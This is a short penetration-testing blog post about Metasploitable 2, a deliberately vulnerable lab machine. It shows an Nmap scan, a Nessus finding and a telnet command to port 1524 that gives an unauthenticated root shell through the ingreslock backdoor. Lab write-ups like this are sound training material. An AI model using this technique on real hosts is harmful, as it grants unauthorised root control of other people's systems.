Quantcast
Channel: Pax Pentest » Exploit
Viewing all articles
Browse latest Browse all 51

Metasploitable 2: Port 1524 ingreslock Backdoor

$
0
0

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1524/tcp  open  ingreslock?

Ingreslock was popular for adding a backdoor on to a compromised server.

The Nessus report had this to say on port 1524:

1524/tcp

Rogue Shell Backdoor Detection

Synopsis

The remote host may have been compromised.

Description

A shell is listening on the remote port, without any authentication. An attacker may use it by connecting to the remote port and sending commands directly.

And so we can test the backdoor connection in the attacking Terminal:

:~# telnet 192.168.1.103 1524
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
root@metasploitable:/#

Very simple.


Viewing all articles
Browse latest Browse all 51

Trending Articles